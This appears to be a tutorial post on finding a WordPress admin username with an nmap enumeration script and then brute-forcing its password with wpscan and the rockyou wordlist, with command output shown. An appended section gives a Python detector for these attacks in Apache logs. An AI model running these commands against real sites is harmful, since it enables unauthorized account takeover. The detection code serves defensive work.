The wpscan utility can be used to brute-force a WordPress password very easily.
First, though, we need the WordPress username. Nmap supports user enumeration for WordPress through its http-wordpress-enum script, so this is easy.

ubuntu ~ $ nmap -sV --script http-wordpress-enum --script-args limit=195 somewordpresssite.com
Starting Nmap 6.40 ( http://nmap.org ) at 2017-07-21 02:14 UTC
Nmap scan report for somewordpresssite.com (XXX.XXX.XXX.XX)
Host is up (0.0036s latency).
rDNS record for XXX.XXX.XXX.XX: host17.somenet.com
Not shown: 941 filtered ports, 55 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD
80/tcp   open  http     Apache httpd
| http-wordpress-enum:
| Username found: admin
|_Search stopped at ID #195. Increase the upper limit if necessary with 'http-wordpress-enum.limit'
443/tcp  open  ssl/http Apache httpd
8022/tcp open  ssh      OpenSSH 5.3 (protocol 2.0)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 508.92 seconds

Now that we have the username ‘admin’, we can try to crack the password by working through a large wordlist and trying each candidate password against the account.

┌─[✗]─[root@parrot]─[/home/user]
└──╼ #wpscan -u somewordpresssite.com --threads 20 --wordlist /home/user/rockyou.txt --username admin
:48:01 <=== > (802660 / 14344393) 5.59% ETA: 47:14:38

This will take a very long time, and it will only work if the password is in the wordlist. To crack a stronger password you would need a massive wordlist of 13 gigabytes or more, and a very long password would require an even larger one. Still, you could get lucky with this attack, so it is well worth trying, unless the site has Cloudflare protection.
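
Seen from the server side, both stages above are noisy and show up in the Apache access log. The following is an added example, not part of the original post: it flags clients that probe many author IDs or send many login POSTs. It assumes the combined log format, that enumeration appears as `/?author=N` requests and guessing as POSTs to `/wp-login.php` or `/xmlrpc.php`; the thresholds, IP addresses and log lines are constructed.

```python
import re
from collections import defaultdict

# Apache combined log format: client IP, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')
AUTHOR_RE = re.compile(r'[?&]author=(\d+)')
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")

# Assumed thresholds; tune them to the site's normal traffic.
ENUM_THRESHOLD = 10    # distinct author IDs probed by one client
LOGIN_THRESHOLD = 20   # login POSTs sent by one client

def analyze(lines):
    """Return {ip: set of findings} for clients over either threshold."""
    author_ids = defaultdict(set)
    login_posts = defaultdict(int)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        ip, method, url, _status = m.groups()
        a = AUTHOR_RE.search(url)
        if a:
            author_ids[ip].add(int(a.group(1)))
        path = url.split("?", 1)[0]
        if method == "POST" and path in LOGIN_PATHS:
            login_posts[ip] += 1
    findings = defaultdict(set)
    for ip, ids in author_ids.items():
        if len(ids) >= ENUM_THRESHOLD:
            findings[ip].add("user-enumeration")
    for ip, count in login_posts.items():
        if count >= LOGIN_THRESHOLD:
            findings[ip].add("password-guessing")
    return dict(findings)

def sample_log():
    """Constructed sample: one noisy client and one ordinary visitor."""
    ts = "[21/Jul/2017:02:14:00 +0000]"
    noisy, normal = "203.0.113.7", "198.51.100.23"
    lines = [f'{noisy} - - {ts} "GET /?author={i} HTTP/1.1" 301 0 "-" "-"' for i in range(1, 196)]
    lines += [f'{noisy} - - {ts} "POST /wp-login.php HTTP/1.1" 200 3120 "-" "-"' for _ in range(500)]
    lines += [f'{normal} - - {ts} "GET /?author=1 HTTP/1.1" 301 0 "-" "-"',
              f'{normal} - - {ts} "POST /wp-login.php HTTP/1.1" 302 0 "-" "-"']
    return lines

if __name__ == "__main__":
    for ip, what in analyze(sample_log()).items():
        print(ip, sorted(what))
```

Flagged addresses can be fed into rate limiting or a temporary block; a single visitor who views one author page and logs in once stays below both thresholds.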